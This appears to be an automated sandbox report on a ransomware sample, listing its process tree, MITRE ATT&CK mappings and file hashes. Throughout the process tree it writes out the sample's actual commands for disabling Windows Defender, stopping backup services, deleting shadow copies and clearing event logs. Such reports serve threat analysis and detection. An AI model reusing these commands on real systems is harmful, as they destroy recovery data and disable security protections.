PID 468 wrote to memory of 2016	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 2016	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2016 wrote to memory of 2004	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2004	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2004	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2004	2016	net.exe	net1.exe
PID 468 wrote to memory of 1204	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1204	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1204	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1204	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 1204 wrote to memory of 1056	1204	net.exe	net1.exe
PID 1204 wrote to memory of 1056	1204	net.exe	net1.exe
PID 1204 wrote to memory of 1056	1204	net.exe	net1.exe
PID 1204 wrote to memory of 1056	1204	net.exe	net1.exe
PID 468 wrote to memory of 1096	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1096	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1096	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1096	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 1096 wrote to memory of 1324	1096	net.exe	net1.exe
PID 1096 wrote to memory of 1324	1096	net.exe	net1.exe
PID 1096 wrote to memory of 1324	1096	net.exe	net1.exe
PID 1096 wrote to memory of 1324	1096	net.exe	net1.exe
PID 468 wrote to memory of 1772	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1772	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1772	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1772	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 1772 wrote to memory of 1008	1772	net.exe	net1.exe
PID 1772 wrote to memory of 1008	1772	net.exe	net1.exe
PID 1772 wrote to memory of 1008	1772	net.exe	net1.exe
PID 1772 wrote to memory of 1008	1772	net.exe	net1.exe
PID 468 wrote to memory of 1804	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1804	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1804	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1804	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 1804 wrote to memory of 1632	1804	net.exe	net1.exe
PID 1804 wrote to memory of 1632	1804	net.exe	net1.exe
PID 1804 wrote to memory of 1632	1804	net.exe	net1.exe
PID 1804 wrote to memory of 1632	1804	net.exe	net1.exe
PID 468 wrote to memory of 932	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 932	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 932	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 932	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 932 wrote to memory of 1760	932	net.exe	net1.exe
PID 932 wrote to memory of 1760	932	net.exe	net1.exe
PID 932 wrote to memory of 1760	932	net.exe	net1.exe
PID 932 wrote to memory of 1760	932	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:468
- C:\Windows\SysWOW64\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1220
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:984
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:916
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2004
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:1056
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:1324
- C:\Windows\SysWOW64\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:1008
- C:\Windows\SysWOW64\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:1632
- C:\Windows\SysWOW64\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:932
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:1760
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  PID:1748
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  PID:536
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  PID:1496
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  PID:592
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  PID:912
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  PID:1984
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  PID:1540
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  PID:1624
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1372
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:1408
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1532
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:1992
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:1056
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:980
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1556
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1212
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1912
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1896
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:1900
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1920
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1712
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1644
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1596
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1696
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1560
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:360
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:2040
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1336
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:1860
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1884
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1364
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1080
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1572
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1672
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1632
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1716
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:1916
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1720
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1216
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:960
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2128
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe C:\b8Bo_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe"
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
03f89b7b085750d8964f666e79c8ca75

SHA1
744239ec00ba92348868648f8977eafcbe220db3

SHA256
5bad5a31a2416b47eb23d189dca2727fbe4ab016d5bf849748af8adb3df66e19

SHA512
7c755ad73eed2a5a1a67fa7b6013ef576447883dca751be0282a61ffbf5569ccc6989dd0eedb12ba5bb31965cbfd46107f017294c196d826e36eb1cf82b0beab

Download Submit
C:\b8Bo_HOW_TO_DECRYPT.txt

MD5
0bfd67750d847c7d40fd665231d801c3

SHA1
1d6e2b795fa346ded4f6ae6f7400633d858daa8e

SHA256
b3ece1708e325095f23e9cf8563ab4ee467896dccfef3d432a85ed3541bf1b7e

SHA512
0e7a7de20e7912f9aa11380ef7b300a4ca799d2a71baefca130e6db89e72e036565facb5269fc4061bd59a7ad0f3bc429aac7f5f1366500274fca0bb5abfd0da

Download Submit
memory/360-99-0x0000000000000000-mapping.dmp

Download
memory/536-72-0x0000000000000000-mapping.dmp

Download
memory/592-74-0x0000000000000000-mapping.dmp

Download
memory/612-57-0x0000000000000000-mapping.dmp

Download
memory/912-75-0x0000000000000000-mapping.dmp

Download
memory/916-58-0x0000000000000000-mapping.dmp

Download
memory/932-69-0x0000000000000000-mapping.dmp

Download
memory/960-118-0x0000000000000000-mapping.dmp

Download
memory/964-121-0x00000000023C0000-0x000000000300A000-memory.dmp

Filesize
12.3MB

Download
memory/964-120-0x00000000023C0000-0x000000000300A000-memory.dmp

Filesize
12.3MB

Download
memory/964-119-0x0000000075901000-0x0000000075903000-memory.dmp

Filesize
8KB

Download
memory/964-122-0x00000000023C0000-0x000000000300A000-memory.dmp

Filesize
12.3MB

Download
memory/980-84-0x0000000000000000-mapping.dmp

Download
memory/984-56-0x0000000000000000-mapping.dmp

Download
memory/1008-66-0x0000000000000000-mapping.dmp

Download
memory/1056-83-0x0000000000000000-mapping.dmp

Download
memory/1056-62-0x0000000000000000-mapping.dmp

Download
memory/1080-105-0x0000000000000000-mapping.dmp

Download
memory/1096-63-0x0000000000000000-mapping.dmp

Download
memory/1120-117-0x0000000000000000-mapping.dmp

Download
memory/1204-61-0x0000000000000000-mapping.dmp

Download
memory/1212-86-0x0000000000000000-mapping.dmp

Download
memory/1216-112-0x0000000000000000-mapping.dmp

Download
memory/1220-55-0x0000000000000000-mapping.dmp

Download
memory/1324-64-0x0000000000000000-mapping.dmp

Download
memory/1336-101-0x0000000000000000-mapping.dmp

Download
memory/1364-104-0x0000000000000000-mapping.dmp

Download
memory/1368-95-0x0000000000000000-mapping.dmp

Download
memory/1372-79-0x0000000000000000-mapping.dmp

Download
memory/1408-80-0x0000000000000000-mapping.dmp

Download
memory/1496-73-0x0000000000000000-mapping.dmp

Download
memory/1532-81-0x0000000000000000-mapping.dmp

Download
memory/1540-77-0x0000000000000000-mapping.dmp

Download
memory/1556-85-0x0000000000000000-mapping.dmp

Download
memory/1560-98-0x0000000000000000-mapping.dmp

Download
memory/1572-106-0x0000000000000000-mapping.dmp

Download
memory/1596-93-0x0000000000000000-mapping.dmp

Download
memory/1612-115-0x0000000000000000-mapping.dmp

Download
memory/1624-78-0x0000000000000000-mapping.dmp

Download
memory/1632-108-0x0000000000000000-mapping.dmp

Download
memory/1632-68-0x0000000000000000-mapping.dmp

Download
memory/1644-92-0x0000000000000000-mapping.dmp

Download
memory/1672-107-0x0000000000000000-mapping.dmp

Download
memory/1696-94-0x0000000000000000-mapping.dmp

Download
memory/1712-91-0x0000000000000000-mapping.dmp

Download
memory/1716-109-0x0000000000000000-mapping.dmp

Download
memory/1720-111-0x0000000000000000-mapping.dmp

Download
memory/1732-113-0x0000000000000000-mapping.dmp

Download
memory/1748-71-0x0000000000000000-mapping.dmp

Download
memory/1760-70-0x0000000000000000-mapping.dmp

Download
memory/1772-65-0x0000000000000000-mapping.dmp

Download
memory/1804-67-0x0000000000000000-mapping.dmp

Download
memory/1824-97-0x0000000000000000-mapping.dmp

Download
memory/1860-102-0x0000000000000000-mapping.dmp

Download
memory/1884-103-0x0000000000000000-mapping.dmp

Download
memory/1896-88-0x0000000000000000-mapping.dmp

Download
memory/1900-89-0x0000000000000000-mapping.dmp

Download
memory/1912-87-0x0000000000000000-mapping.dmp

Download
memory/1916-110-0x0000000000000000-mapping.dmp

Download
memory/1920-90-0x0000000000000000-mapping.dmp

Download
memory/1944-114-0x0000000000000000-mapping.dmp

Download
memory/1948-116-0x0000000000000000-mapping.dmp

Download
memory/1984-76-0x0000000000000000-mapping.dmp

Download
memory/1992-82-0x0000000000000000-mapping.dmp

Download
memory/2004-60-0x0000000000000000-mapping.dmp

Download
memory/2012-96-0x0000000000000000-mapping.dmp

Download
memory/2016-59-0x0000000000000000-mapping.dmp

Download
memory/2040-100-0x0000000000000000-mapping.dmp

Download
memory/2128-125-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/2128-126-0x0000000002391000-0x0000000002392000-memory.dmp

Filesize
4KB

Download
memory/2128-127-0x0000000002392000-0x0000000002394000-memory.dmp

Filesize
8KB

Download